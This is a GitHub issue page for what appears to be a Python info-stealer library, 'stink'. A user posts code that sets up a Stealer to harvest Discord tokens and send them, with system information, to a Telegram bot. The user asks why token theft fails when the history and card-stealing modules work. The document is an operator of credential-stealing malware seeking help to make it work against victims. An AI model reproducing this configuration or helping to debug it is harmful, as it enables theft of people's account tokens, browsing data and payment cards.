We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Code:
from stink import Stealer, Features, Senders if __name__ == '__main__': Stealer( senders=[ Senders.telegram(token="7251436322:...", user_id=...) ], features=[ Features.discord ] ).run()
Im getting the system information in my telegram, but no tokens. I censored my token bot and my user ID, but its there btw.
All other modules, such as history, cards, etc., work correctly. Except Discord.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Code:
Im getting the system information in my telegram, but no tokens.
I censored my token bot and my user ID, but its there btw.
All other modules, such as history, cards, etc., work correctly. Except Discord.
The text was updated successfully, but these errors were encountered: